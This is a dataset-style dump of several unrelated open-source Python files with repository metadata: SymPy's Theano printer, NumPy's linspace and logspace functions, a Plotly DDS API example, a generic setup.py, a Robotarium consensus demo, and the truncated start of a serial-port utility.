if crossword.empty is not None:
ipuz_dict["empty"] = crossword.empty
across_clues = [list(item) for item in crossword.clues.across()]
down_clues = [list(item) for item in crossword.clues.down()]
if across_clues or down_clues:
ipuz_dict["clues"] = {}
if across_clues:
ipuz_dict["clues"]['Across'] = across_clues
if down_clues:
ipuz_dict["clues"]['Down'] = down_clues
if crossword._format_identifier == Crossword.IPUZ:
ipuz_dict.update(crossword._format)
return ipuz_dict
| 33.695652
| 69
| 0.612903
|
5218b3b231321aff7264685bf8fbe70afad19eb4
| 1,198
|
py
|
Python
|
mutations/updateApp/example.py
|
plotly/dds-api-docs
|
61fe3f74d5546b45bd1c960473beac6097bba7a1
|
[
"MIT"
] | 6
|
2019-09-15T22:19:07.000Z
|
2021-01-27T20:23:03.000Z
|
mutations/updateApp/example.py
|
plotly/dds-api-docs
|
61fe3f74d5546b45bd1c960473beac6097bba7a1
|
[
"MIT"
] | 2
|
2019-04-04T01:26:40.000Z
|
2020-02-13T23:39:28.000Z
|
mutations/updateApp/example.py
|
plotly/dds-api-docs
|
61fe3f74d5546b45bd1c960473beac6097bba7a1
|
[
"MIT"
] | 2
|
2019-03-19T19:00:52.000Z
|
2020-02-09T11:53:01.000Z
|
from gql import gql
from dds import client as dds_client
update_app_mutation = gql(
"""
mutation {
updateApp(
metadata: {
title: "title",
description: "description",
tags: "tag1,tag2,tag3",
showInPortal: true,
permissionLevel: restricted,
contact: {
name: "contact-name",
email: "contact-email@test.com"
}
},
appname: "test-app"
) {
app {
name
metadata {
title
description
tags
showInPortal
permissionLevel
contact {
name
email
}
}
}
error
}
}
"""
)
result = dds_client.execute(update_app_mutation)["updateApp"]
print(f"updated app name: {result['app']['name']}")
print(
f"updated metadata contact email: {result['app']['metadata']['contact']['email']}"
)
print(f"error: {result['error']}")
| 24.958333
| 86
| 0.412354
|
94c381be2092a47f3e036773e9760e7fdea96a1e
| 17,626
|
py
|
Python
|
sympy/printing/theanocode.py
|
iamabhishek0/sympy
|
c461bd1ff9d178d1012b04fd0bf37ee3abb02cdd
|
[
"BSD-3-Clause"
] | 445
|
2019-01-26T13:50:26.000Z
|
2022-03-18T05:17:38.000Z
|
sympy/printing/theanocode.py
|
iamabhishek0/sympy
|
c461bd1ff9d178d1012b04fd0bf37ee3abb02cdd
|
[
"BSD-3-Clause"
] | 242
|
2019-01-29T15:48:27.000Z
|
2022-03-31T22:09:21.000Z
|
sympy/printing/theanocode.py
|
iamabhishek0/sympy
|
c461bd1ff9d178d1012b04fd0bf37ee3abb02cdd
|
[
"BSD-3-Clause"
] | 31
|
2019-03-10T09:51:27.000Z
|
2022-02-14T23:11:12.000Z
|
from __future__ import print_function, division
from sympy.core.compatibility import range, is_sequence
from sympy.external import import_module
from sympy.printing.printer import Printer
import sympy
from functools import partial
theano = import_module('theano')
if theano:
ts = theano.scalar
tt = theano.tensor
from theano.sandbox import linalg as tlinalg
mapping = {
sympy.Add: tt.add,
sympy.Mul: tt.mul,
sympy.Abs: tt.abs_,
sympy.sign: tt.sgn,
sympy.ceiling: tt.ceil,
sympy.floor: tt.floor,
sympy.log: tt.log,
sympy.exp: tt.exp,
sympy.sqrt: tt.sqrt,
sympy.cos: tt.cos,
sympy.acos: tt.arccos,
sympy.sin: tt.sin,
sympy.asin: tt.arcsin,
sympy.tan: tt.tan,
sympy.atan: tt.arctan,
sympy.atan2: tt.arctan2,
sympy.cosh: tt.cosh,
sympy.acosh: tt.arccosh,
sympy.sinh: tt.sinh,
sympy.asinh: tt.arcsinh,
sympy.tanh: tt.tanh,
sympy.atanh: tt.arctanh,
sympy.re: tt.real,
sympy.im: tt.imag,
sympy.arg: tt.angle,
sympy.erf: tt.erf,
sympy.gamma: tt.gamma,
sympy.loggamma: tt.gammaln,
sympy.Pow: tt.pow,
sympy.Eq: tt.eq,
sympy.StrictGreaterThan: tt.gt,
sympy.StrictLessThan: tt.lt,
sympy.LessThan: tt.le,
sympy.GreaterThan: tt.ge,
sympy.And: tt.and_,
sympy.Or: tt.or_,
sympy.Max: tt.maximum, # SymPy accepts >2 inputs, Theano only 2
sympy.Min: tt.minimum, # SymPy accepts >2 inputs, Theano only 2
sympy.conjugate: tt.conj,
sympy.numbers.ImaginaryUnit: lambda:tt.complex(0,1),
# Matrices
sympy.MatAdd: tt.Elemwise(ts.add),
sympy.HadamardProduct: tt.Elemwise(ts.mul),
sympy.Trace: tlinalg.trace,
sympy.Determinant : tlinalg.det,
sympy.Inverse: tlinalg.matrix_inverse,
sympy.Transpose: tt.DimShuffle((False, False), [1, 0]),
}
class TheanoPrinter(Printer):
""" Code printer which creates Theano symbolic expression graphs.
Parameters
==========
cache : dict
Cache dictionary to use. If None (default) will use
the global cache. To create a printer which does not depend on or alter
global state pass an empty dictionary. Note: the dictionary is not
copied on initialization of the printer and will be updated in-place,
so using the same dict object when creating multiple printers or making
multiple calls to :func:`.theano_code` or :func:`.theano_function` means
the cache is shared between all these applications.
Attributes
==========
cache : dict
A cache of Theano variables which have been created for Sympy
symbol-like objects (e.g. :class:`sympy.core.symbol.Symbol` or
:class:`sympy.matrices.expressions.MatrixSymbol`). This is used to
ensure that all references to a given symbol in an expression (or
multiple expressions) are printed as the same Theano variable, which is
created only once. Symbols are differentiated only by name and type. The
format of the cache's contents should be considered opaque to the user.
"""
printmethod = "_theano"
def __init__(self, *args, **kwargs):
self.cache = kwargs.pop('cache', dict())
super(TheanoPrinter, self).__init__(*args, **kwargs)
def _get_key(self, s, name=None, dtype=None, broadcastable=None):
""" Get the cache key for a Sympy object.
Parameters
==========
s : sympy.core.basic.Basic
Sympy object to get key for.
name : str
Name of object, if it does not have a ``name`` attribute.
"""
if name is None:
name = s.name
return (name, type(s), s.args, dtype, broadcastable)
def _get_or_create(self, s, name=None, dtype=None, broadcastable=None):
"""
Get the Theano variable for a Sympy symbol from the cache, or create it
if it does not exist.
"""
# Defaults
if name is None:
name = s.name
if dtype is None:
dtype = 'floatX'
if broadcastable is None:
broadcastable = ()
key = self._get_key(s, name, dtype=dtype, broadcastable=broadcastable)
if key in self.cache:
return self.cache[key]
value = tt.tensor(name=name, dtype=dtype, broadcastable=broadcastable)
self.cache[key] = value
return value
def _print_Symbol(self, s, **kwargs):
dtype = kwargs.get('dtypes', {}).get(s)
bc = kwargs.get('broadcastables', {}).get(s)
return self._get_or_create(s, dtype=dtype, broadcastable=bc)
def _print_AppliedUndef(self, s, **kwargs):
name = str(type(s)) + '_' + str(s.args[0])
dtype = kwargs.get('dtypes', {}).get(s)
bc = kwargs.get('broadcastables', {}).get(s)
return self._get_or_create(s, name=name, dtype=dtype, broadcastable=bc)
def _print_Basic(self, expr, **kwargs):
op = mapping[type(expr)]
children = [self._print(arg, **kwargs) for arg in expr.args]
return op(*children)
def _print_Number(self, n, **kwargs):
# Integers already taken care of below, interpret as float
return float(n.evalf())
def _print_MatrixSymbol(self, X, **kwargs):
dtype = kwargs.get('dtypes', {}).get(X)
return self._get_or_create(X, dtype=dtype, broadcastable=(None, None))
def _print_DenseMatrix(self, X, **kwargs):
if not hasattr(tt, 'stacklists'):
raise NotImplementedError(
"Matrix translation not yet supported in this version of Theano")
return tt.stacklists([
[self._print(arg, **kwargs) for arg in L]
for L in X.tolist()
])
_print_ImmutableMatrix = _print_ImmutableDenseMatrix = _print_DenseMatrix
def _print_MatMul(self, expr, **kwargs):
children = [self._print(arg, **kwargs) for arg in expr.args]
result = children[0]
for child in children[1:]:
result = tt.dot(result, child)
return result
def _print_MatPow(self, expr, **kwargs):
children = [self._print(arg, **kwargs) for arg in expr.args]
result = 1
if isinstance(children[1], int) and children[1] > 0:
for i in range(children[1]):
result = tt.dot(result, children[0])
else:
raise NotImplementedError('''Only non-negative integer
powers of matrices can be handled by Theano at the moment''')
return result
def _print_MatrixSlice(self, expr, **kwargs):
parent = self._print(expr.parent, **kwargs)
rowslice = self._print(slice(*expr.rowslice), **kwargs)
colslice = self._print(slice(*expr.colslice), **kwargs)
return parent[rowslice, colslice]
def _print_BlockMatrix(self, expr, **kwargs):
nrows, ncols = expr.blocks.shape
blocks = [[self._print(expr.blocks[r, c], **kwargs)
for c in range(ncols)]
for r in range(nrows)]
return tt.join(0, *[tt.join(1, *row) for row in blocks])
def _print_slice(self, expr, **kwargs):
return slice(*[self._print(i, **kwargs)
if isinstance(i, sympy.Basic) else i
for i in (expr.start, expr.stop, expr.step)])
def _print_Pi(self, expr, **kwargs):
return 3.141592653589793
def _print_Piecewise(self, expr, **kwargs):
import numpy as np
e, cond = expr.args[0].args # First condition and corresponding value
# Print conditional expression and value for first condition
p_cond = self._print(cond, **kwargs)
p_e = self._print(e, **kwargs)
# One condition only
if len(expr.args) == 1:
# Return value if condition else NaN
return tt.switch(p_cond, p_e, np.nan)
# Return value_1 if condition_1 else evaluate remaining conditions
p_remaining = self._print(sympy.Piecewise(*expr.args[1:]), **kwargs)
return tt.switch(p_cond, p_e, p_remaining)
def _print_Rational(self, expr, **kwargs):
return tt.true_div(self._print(expr.p, **kwargs),
self._print(expr.q, **kwargs))
def _print_Integer(self, expr, **kwargs):
return expr.p
def _print_factorial(self, expr, **kwargs):
return self._print(sympy.gamma(expr.args[0] + 1), **kwargs)
def _print_Derivative(self, deriv, **kwargs):
rv = self._print(deriv.expr, **kwargs)
for var in deriv.variables:
var = self._print(var, **kwargs)
rv = tt.Rop(rv, var, tt.ones_like(var))
return rv
def emptyPrinter(self, expr):
return expr
def doprint(self, expr, dtypes=None, broadcastables=None):
""" Convert a Sympy expression to a Theano graph variable.
The ``dtypes`` and ``broadcastables`` arguments are used to specify the
data type, dimension, and broadcasting behavior of the Theano variables
corresponding to the free symbols in ``expr``. Each is a mapping from
Sympy symbols to the value of the corresponding argument to
``theano.tensor.Tensor``.
See the corresponding `documentation page`__ for more information on
broadcasting in Theano.
.. __: http://deeplearning.net/software/theano/tutorial/broadcasting.html
Parameters
==========
expr : sympy.core.expr.Expr
Sympy expression to print.
dtypes : dict
Mapping from Sympy symbols to Theano datatypes to use when creating
new Theano variables for those symbols. Corresponds to the ``dtype``
argument to ``theano.tensor.Tensor``. Defaults to ``'floatX'``
for symbols not included in the mapping.
broadcastables : dict
Mapping from Sympy symbols to the value of the ``broadcastable``
argument to ``theano.tensor.Tensor`` to use when creating Theano
variables for those symbols. Defaults to the empty tuple for symbols
not included in the mapping (resulting in a scalar).
Returns
=======
theano.gof.graph.Variable
A variable corresponding to the expression's value in a Theano
symbolic expression graph.
"""
if dtypes is None:
dtypes = {}
if broadcastables is None:
broadcastables = {}
return self._print(expr, dtypes=dtypes, broadcastables=broadcastables)
global_cache = {}
def theano_code(expr, cache=None, **kwargs):
"""
Convert a Sympy expression into a Theano graph variable.
Parameters
==========
expr : sympy.core.expr.Expr
Sympy expression object to convert.
cache : dict
Cached Theano variables (see :class:`TheanoPrinter.cache
<TheanoPrinter>`). Defaults to the module-level global cache.
dtypes : dict
Passed to :meth:`.TheanoPrinter.doprint`.
broadcastables : dict
Passed to :meth:`.TheanoPrinter.doprint`.
Returns
=======
theano.gof.graph.Variable
A variable corresponding to the expression's value in a Theano symbolic
expression graph.
"""
if not theano:
raise ImportError("theano is required for theano_code")
if cache is None:
cache = global_cache
return TheanoPrinter(cache=cache, settings={}).doprint(expr, **kwargs)
def dim_handling(inputs, dim=None, dims=None, broadcastables=None):
r"""
Get value of ``broadcastables`` argument to :func:`.theano_code` from
keyword arguments to :func:`.theano_function`.
Included for backwards compatibility.
Parameters
==========
inputs
Sequence of input symbols.
dim : int
Common number of dimensions for all inputs. Overrides other arguments
if given.
dims : dict
Mapping from input symbols to number of dimensions. Overrides
``broadcastables`` argument if given.
broadcastables : dict
Explicit value of ``broadcastables`` argument to
:meth:`.TheanoPrinter.doprint`. If not None function will return this value unchanged.
Returns
=======
dict
Dictionary mapping elements of ``inputs`` to their "broadcastable"
values (tuple of ``bool``\ s).
"""
if dim is not None:
return {s: (False,) * dim for s in inputs}
if dims is not None:
maxdim = max(dims.values())
return {
s: (False,) * d + (True,) * (maxdim - d)
for s, d in dims.items()
}
if broadcastables is not None:
return broadcastables
return {}
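# Illustrative sketch (not part of this module; the function name is
# hypothetical): the three ways dim_handling() fills in ``broadcastables``.
# Pure Python, no Theano needed; the strings 'x' and 'y' stand in for SymPy
# symbols.
def _dim_handling_sketch():
    assert dim_handling(['x', 'y'], dim=2) == {
        'x': (False, False), 'y': (False, False)}
    assert dim_handling(['x', 'y'], dims={'x': 1, 'y': 2}) == {
        'x': (False, True), 'y': (False, False)}
    explicit = {'x': (False,)}
    assert dim_handling(['x'], broadcastables=explicit) is explicit
    assert dim_handling(['x']) == {}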
def theano_function(inputs, outputs, scalar=False, **kwargs):
"""
Create a Theano function from SymPy expressions.
The inputs and outputs are converted to Theano variables using
:func:`.theano_code` and then passed to ``theano.function``.
Parameters
==========
inputs
Sequence of symbols which constitute the inputs of the function.
outputs
Sequence of expressions which constitute the outputs(s) of the
function. The free symbols of each expression must be a subset of
``inputs``.
scalar : bool
Convert 0-dimensional arrays in output to scalars. This will return a
Python wrapper function around the Theano function object.
cache : dict
Cached Theano variables (see :class:`TheanoPrinter.cache
<TheanoPrinter>`). Defaults to the module-level global cache.
dtypes : dict
Passed to :meth:`.TheanoPrinter.doprint`.
broadcastables : dict
Passed to :meth:`.TheanoPrinter.doprint`.
dims : dict
Alternative to ``broadcastables`` argument. Mapping from elements of
``inputs`` to integers indicating the dimension of their associated
arrays/tensors. Overrides ``broadcastables`` argument if given.
dim : int
Another alternative to the ``broadcastables`` argument. Common number of
dimensions to use for all arrays/tensors.
``theano_function([x, y], [...], dim=2)`` is equivalent to using
``broadcastables={x: (False, False), y: (False, False)}``.
Returns
=======
callable
A callable object which takes values of ``inputs`` as positional
arguments and returns an output array for each of the expressions
in ``outputs``. If ``outputs`` is a single expression the function will
return a Numpy array, if it is a list of multiple expressions the
function will return a list of arrays. See the description of the ``scalar``
argument above for the behavior when a single output is passed in a list.
The returned object will either be an instance of
``theano.compile.function_module.Function`` or a Python wrapper
function around one. In both cases, the returned value will have a
``theano_function`` attribute which points to the return value of
``theano.function``.
Examples
========
>>> from sympy.abc import x, y, z
>>> from sympy.printing.theanocode import theano_function
A simple function with one input and one output:
>>> f1 = theano_function([x], [x**2 - 1], scalar=True)
>>> f1(3)
8.0
A function with multiple inputs and one output:
>>> f2 = theano_function([x, y, z], [(x**z + y**z)**(1/z)], scalar=True)
>>> f2(3, 4, 2)
5.0
A function with multiple inputs and multiple outputs:
>>> f3 = theano_function([x, y], [x**2 + y**2, x**2 - y**2], scalar=True)
>>> f3(2, 3)
[13.0, -5.0]
See also
========
dim_handling
"""
if not theano:
raise ImportError("theano is required for theano_function")
# Pop off non-theano keyword args
cache = kwargs.pop('cache', {})
dtypes = kwargs.pop('dtypes', {})
broadcastables = dim_handling(
inputs,
dim=kwargs.pop('dim', None),
dims=kwargs.pop('dims', None),
broadcastables=kwargs.pop('broadcastables', None),
)
# Print inputs/outputs
code = partial(theano_code, cache=cache, dtypes=dtypes,
broadcastables=broadcastables)
tinputs = list(map(code, inputs))
toutputs = list(map(code, outputs))
# Fix constant expressions as variables
toutputs = [output if isinstance(output, theano.Variable) else tt.as_tensor_variable(output) for output in toutputs]
if len(toutputs) == 1:
toutputs = toutputs[0]
# Compile theano func
func = theano.function(tinputs, toutputs, **kwargs)
is_0d = [len(o.variable.broadcastable) == 0 for o in func.outputs]
# No wrapper required
if not scalar or not any(is_0d):
func.theano_function = func
return func
# Create wrapper to convert 0-dimensional outputs to scalars
def wrapper(*args):
out = func(*args)
# out can be array(1.0) or [array(1.0), array(2.0)]
if is_sequence(out):
return [o[()] if is_0d[i] else o for i, o in enumerate(out)]
else:
return out[()]
wrapper.__wrapped__ = func
wrapper.__doc__ = func.__doc__
wrapper.theano_function = func
return wrapper
| 33.382576
| 120
| 0.613355
|
05fea557a5eabb70af6d2403a59815a85a2e0ba6
| 7,636
|
py
|
Python
|
numpy/core/function_base.py
|
leifdenby/numpy
|
4750c2810c5e0943cbea8e2acc0337c4e66a9bb2
|
[
"BSD-3-Clause"
] | 1
|
2021-01-06T21:28:45.000Z
|
2021-01-06T21:28:45.000Z
|
numpy/core/function_base.py
|
leifdenby/numpy
|
4750c2810c5e0943cbea8e2acc0337c4e66a9bb2
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/core/function_base.py
|
leifdenby/numpy
|
4750c2810c5e0943cbea8e2acc0337c4e66a9bb2
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, absolute_import, print_function
__all__ = ['logspace', 'linspace', 'may_share_memory']
from . import numeric as _nx
from .numeric import result_type, NaN, shares_memory, MAY_SHARE_BOUNDS, TooHardError
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None):
"""
Return evenly spaced numbers over a specified interval.
Returns `num` evenly spaced samples, calculated over the
interval [`start`, `stop`].
The endpoint of the interval can optionally be excluded.
Parameters
----------
start : scalar
The starting value of the sequence.
stop : scalar
The end value of the sequence, unless `endpoint` is set to False.
In that case, the sequence consists of all but the last of ``num + 1``
evenly spaced samples, so that `stop` is excluded. Note that the step
size changes when `endpoint` is False.
num : int, optional
Number of samples to generate. Default is 50. Must be non-negative.
endpoint : bool, optional
If True, `stop` is the last sample. Otherwise, it is not included.
Default is True.
retstep : bool, optional
If True, return (`samples`, `step`), where `step` is the spacing
between samples.
dtype : dtype, optional
The type of the output array. If `dtype` is not given, infer the data
type from the other input arguments.
.. versionadded:: 1.9.0
Returns
-------
samples : ndarray
There are `num` equally spaced samples in the closed interval
``[start, stop]`` or the half-open interval ``[start, stop)``
(depending on whether `endpoint` is True or False).
step : float
Only returned if `retstep` is True
Size of spacing between samples.
See Also
--------
arange : Similar to `linspace`, but uses a step size (instead of the
number of samples).
logspace : Samples uniformly distributed in log space.
Examples
--------
>>> np.linspace(2.0, 3.0, num=5)
array([ 2. , 2.25, 2.5 , 2.75, 3. ])
>>> np.linspace(2.0, 3.0, num=5, endpoint=False)
array([ 2. , 2.2, 2.4, 2.6, 2.8])
>>> np.linspace(2.0, 3.0, num=5, retstep=True)
(array([ 2. , 2.25, 2.5 , 2.75, 3. ]), 0.25)
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 8
>>> y = np.zeros(N)
>>> x1 = np.linspace(0, 10, N, endpoint=True)
>>> x2 = np.linspace(0, 10, N, endpoint=False)
>>> plt.plot(x1, y, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2, y + 0.5, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
"""
num = int(num)
if num < 0:
raise ValueError("Number of samples, %s, must be non-negative." % num)
div = (num - 1) if endpoint else num
# Convert float/complex array scalars to float, gh-3504
start = start * 1.
stop = stop * 1.
dt = result_type(start, stop, float(num))
if dtype is None:
dtype = dt
y = _nx.arange(0, num, dtype=dt)
if num > 1:
delta = stop - start
step = delta / div
if step == 0:
# Special handling for denormal numbers, gh-5437
y /= div
y *= delta
else:
y *= step
else:
# 0 and 1 item long sequences have an undefined step
step = NaN
y += start
if endpoint and num > 1:
y[-1] = stop
if retstep:
return y.astype(dtype, copy=False), step
else:
return y.astype(dtype, copy=False)
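# Illustrative sketch (not part of this module; the function name is
# hypothetical): the step size follows from the divisor chosen above --
# (num - 1) when the endpoint is included, num when it is excluded -- matching
# the docstring examples.
def _linspace_step_sketch():
    samples, step = linspace(2.0, 3.0, num=5, retstep=True)
    assert step == (3.0 - 2.0) / (5 - 1) == 0.25
    samples = linspace(2.0, 3.0, num=5, endpoint=False)
    assert abs((samples[1] - samples[0]) - (3.0 - 2.0) / 5) < 1e-12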
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None):
"""
Return numbers spaced evenly on a log scale.
In linear space, the sequence starts at ``base ** start``
(`base` to the power of `start`) and ends with ``base ** stop``
(see `endpoint` below).
Parameters
----------
start : float
``base ** start`` is the starting value of the sequence.
stop : float
``base ** stop`` is the final value of the sequence, unless `endpoint`
is False. In that case, ``num + 1`` values are spaced over the
interval in log-space, of which all but the last (a sequence of
length ``num``) are returned.
num : integer, optional
Number of samples to generate. Default is 50.
endpoint : boolean, optional
If true, `stop` is the last sample. Otherwise, it is not included.
Default is True.
base : float, optional
The base of the log space. The step size between the elements in
``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform.
Default is 10.0.
dtype : dtype
The type of the output array. If `dtype` is not given, infer the data
type from the other input arguments.
Returns
-------
samples : ndarray
`num` samples, equally spaced on a log scale.
See Also
--------
arange : Similar to linspace, with the step size specified instead of the
number of samples. Note that, when used with a float endpoint, the
endpoint may or may not be included.
linspace : Similar to logspace, but with the samples uniformly distributed
in linear space, instead of log space.
Notes
-----
Logspace is equivalent to the code
>>> y = np.linspace(start, stop, num=num, endpoint=endpoint)
... # doctest: +SKIP
>>> power(base, y).astype(dtype)
... # doctest: +SKIP
Examples
--------
>>> np.logspace(2.0, 3.0, num=4)
array([ 100. , 215.443469 , 464.15888336, 1000. ])
>>> np.logspace(2.0, 3.0, num=4, endpoint=False)
array([ 100. , 177.827941 , 316.22776602, 562.34132519])
>>> np.logspace(2.0, 3.0, num=4, base=2.0)
array([ 4. , 5.0396842 , 6.34960421, 8. ])
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 10
>>> x1 = np.logspace(0.1, 1, N, endpoint=True)
>>> x2 = np.logspace(0.1, 1, N, endpoint=False)
>>> y = np.zeros(N)
>>> plt.plot(x1, y, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2, y + 0.5, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
"""
y = linspace(start, stop, num=num, endpoint=endpoint)
if dtype is None:
return _nx.power(base, y)
return _nx.power(base, y).astype(dtype)
def may_share_memory(a, b, max_work=None):
"""Determine if two arrays can share memory
A return of True does not necessarily mean that the two arrays
share any element. It just means that they *might*.
Only the memory bounds of a and b are checked by default.
Parameters
----------
a, b : ndarray
Input arrays
max_work : int, optional
Effort to spend on solving the overlap problem. See
`shares_memory` for details. Default for ``may_share_memory``
is to do a bounds check.
Returns
-------
out : bool
See Also
--------
shares_memory
Examples
--------
>>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
False
>>> x = np.zeros([3, 4])
>>> np.may_share_memory(x[:,0], x[:,1])
True
"""
if max_work is None:
max_work = MAY_SHARE_BOUNDS
try:
return shares_memory(a, b, max_work=max_work)
except (TooHardError, OverflowError):
# Unable to determine, assume yes
return True
| 30.91498
| 84
| 0.583944
|
0b244a62d7021362d8739c19e7ef6455d6111072
| 2,669
|
py
|
Python
|
setup.py
|
CryptoChris7/Universal-setup.py
|
8dbb49729e6e1d9cdbc81b5e1cad9cccecdde4a3
|
[
"MIT"
] | null | null | null |
setup.py
|
CryptoChris7/Universal-setup.py
|
8dbb49729e6e1d9cdbc81b5e1cad9cccecdde4a3
|
[
"MIT"
] | null | null | null |
setup.py
|
CryptoChris7/Universal-setup.py
|
8dbb49729e6e1d9cdbc81b5e1cad9cccecdde4a3
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
import os
import re
import ast
HTTP = re.compile('^https?://.+#egg=(.+)$')
class UniversalSetupError(Exception):
pass
def parse_dependency_info() -> dict:
"""Reads dependency info from requirements.txt"""
packages = []
links = []
try:
with open('requirements.txt') as dependencies:
for line in map(str.strip, dependencies):
link = HTTP.match(line)
if link:
packages.append(link.group(1))
links.append(line)
else:
packages.append(line)
except FileNotFoundError:
print('Missing requirements.txt')
return {'install_requires': packages, 'dependency_links': links}
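# Illustrative sketch (not part of this script; the function name and URL are
# hypothetical): how the HTTP regex above splits a "#egg=" style requirement
# line into a package name plus a dependency link, while plain requirement
# lines fall through unchanged.
def _egg_link_sketch():
    line = "https://example.com/some-pkg/archive/main.zip#egg=some-pkg"
    match = HTTP.match(line)
    assert match is not None and match.group(1) == "some-pkg"
    assert HTTP.match("requests==2.25.1") is None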
def read_metadata() -> dict:
"""Finds the package to install and returns it's metadata."""
for entry in os.scandir():
if entry.is_dir():
package_init = os.path.join(entry.name, '__init__.py')
if os.path.isfile(package_init):
break
else:
raise UniversalSetupError('No package found!')
metadata = {'name': entry.name}
meta_names = {'__version__': 'version',
'__author__': 'author',
'__email__': 'author_email',
'__license__': 'license'}
with open(package_init) as init:
code = init.read()
try:
tree = ast.parse(code)
except SyntaxError as exc:
msg = 'Bad syntax in package init: %s'
raise UniversalSetupError(msg % repr(package_init)) from exc
docstring = ast.get_docstring(tree)
if docstring is not None:
metadata['description'] = docstring.split('\n')[0].strip()
else:
print('Missing package docstring!')
for node in ast.iter_child_nodes(tree):
try:
value = node.value
name = node.targets[0].id
if name in meta_names:
meta_name = meta_names[name]
if meta_name in metadata:
msg = 'Repeat metadata assignment on line %d for item %s.'
print(msg % (node.lineno, repr(name)))
metadata[meta_name] = value.s
except AttributeError:
pass
unused_names = []
for name in meta_names:
meta_name = meta_names[name]
if meta_name not in metadata:
unused_names.append(name)
if unused_names:
print('The following metadata is missing: %s' % ', '.join(unused_names))
metadata['packages'] = find_packages()
metadata.update(parse_dependency_info())
return metadata
setup(**read_metadata())
| 29.655556
| 79
| 0.581491
|
f19afde0df670789cde6cdea385d704974c118e8
| 2,209
|
py
|
Python
|
rps/examples/consensus/consensus_fewer_errors.py
|
cglacet/robotarium_python_simulator
|
b58ad6b201f404d0b079dc695f68d916260cc9d1
|
[
"MIT"
] | 69
|
2017-09-28T22:30:43.000Z
|
2022-03-08T15:01:44.000Z
|
rps/examples/consensus/consensus_fewer_errors.py
|
thomaswim/PIR
|
1561f971ee7cc7b1d065a3a6ed5060d6539811ef
|
[
"MIT"
] | 12
|
2017-11-23T18:25:12.000Z
|
2022-02-17T18:06:31.000Z
|
rps/examples/consensus/consensus_fewer_errors.py
|
thomaswim/PIR
|
1561f971ee7cc7b1d065a3a6ed5060d6539811ef
|
[
"MIT"
] | 37
|
2017-11-23T18:15:24.000Z
|
2022-02-15T17:28:09.000Z
|
import rps.robotarium as robotarium
from rps.utilities.graph import *
from rps.utilities.transformations import *
from rps.utilities.barrier_certificates import *
from rps.utilities.misc import *
from rps.utilities.controllers import *
import numpy as np
# Instantiate Robotarium object
N = 12
r = robotarium.Robotarium(number_of_robots=N, show_figure=True, sim_in_real_time=True)
# How many iterations do we want (about N*0.033 seconds)
iterations = 1000
# Maximum linear speed of the robot, as specified by its motors
magnitude_limit = 0.15
# We're working in single-integrator dynamics, and we don't want the robots
# to collide or drive off the testbed. Thus, we're going to use barrier certificates
si_barrier_cert = create_single_integrator_barrier_certificate_with_boundary()
# Create SI to UNI dynamics transformation
si_to_uni_dyn, uni_to_si_states = create_si_to_uni_mapping()
# Generate a connected graph Laplacian (for a cycle graph).
L = cycle_GL(N)
for k in range(iterations):
# Get the poses of the robots and convert to single-integrator poses
x = r.get_poses()
x_si = uni_to_si_states(x)
# Initialize the single-integrator control inputs
si_velocities = np.zeros((2, N))
# For each robot...
for i in range(N):
# Get the neighbors of robot 'i' (encoded in the graph Laplacian)
j = topological_neighbors(L, i)
# Compute the consensus algorithm
si_velocities[:, i] = np.sum(x_si[:, j] - x_si[:, i, None], 1)
# Keep single-integrator control vectors under the specified magnitude
# (threshold the control inputs).
norms = np.linalg.norm(si_velocities, 2, 0)
idxs_to_normalize = (norms > magnitude_limit)
si_velocities[:, idxs_to_normalize] *= magnitude_limit/norms[idxs_to_normalize]
# Use the barrier certificate to avoid collisions
si_velocities = si_barrier_cert(si_velocities, x_si)
# Transform single integrator to unicycle
dxu = si_to_uni_dyn(si_velocities, x)
# Set the velocities of agents 1,...,N
r.set_velocities(np.arange(N), dxu)
# Iterate the simulation
r.step()
# Call at the end of the script to print debug information and to ensure your script runs properly on the Robotarium server.
r.call_at_scripts_end()
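# Illustrative sketch (not part of the original script; the function name is
# hypothetical): the consensus update computed in the loop above, on a toy
# 1-D example with three agents on a cycle graph. Each agent's velocity is the
# sum of differences to its neighbours, pulling all agents toward their common
# average.
def _consensus_sketch():
    x = np.array([[0.0, 1.0, 5.0]])                 # 1-D positions of 3 agents
    neighbors = {0: [1, 2], 1: [0, 2], 2: [0, 1]}   # cycle graph on 3 nodes
    velocities = np.zeros_like(x)
    for i in range(3):
        j = neighbors[i]
        velocities[:, i] = np.sum(x[:, j] - x[:, i, None], 1)
    # Agent 0 is pulled toward agents 1 and 2: (1 - 0) + (5 - 0) = 6.
    assert velocities[0, 0] == 6.0
    return velocities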
| 33.469697
| 110
| 0.741059
|
83e5e475f21c67047e500bc73598e90089aed40d
| 1,495
|
py
|
Python
|
test_bench/serial_ctrl.py
|
LogicPi-cn/SerialMasterPyqt5
|
a6598101e5d4d617f1e3f3785d2a9c5ed2df604e
|
[
"MIT"
] | null | null | null |
test_bench/serial_ctrl.py
|
LogicPi-cn/SerialMasterPyqt5
|
a6598101e5d4d617f1e3f3785d2a9c5ed2df604e
|
[
"MIT"
] | null | null | null |
test_bench/serial_ctrl.py
|
LogicPi-cn/SerialMasterPyqt5
|
a6598101e5d4d617f1e3f3785d2a9c5ed2df604e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import paho.mqtt.client as mqtt
import time
import hashlib
import hmac
import random
import json
import serial
import serial.tools.list_ports
import datetime
import threading
# Serial port handle
g_serial = None
# Whether the serial port is open
g_port_is_open = False
# Receive-thread running flag
g_rec_run = False
# Receive counter
g_rec_cnt = 0
# Send counter
g_snd_cnt = 0
def log_print(text):
"""
Print a message prefixed with the current date and time.
"""
now = datetime.datetime.now()
otherStyleTime = now.strftime("%Y-%m-%d %H:%M:%S")
msg = otherStyleTime + " - " + text
print(msg)
def get_serial():
"""
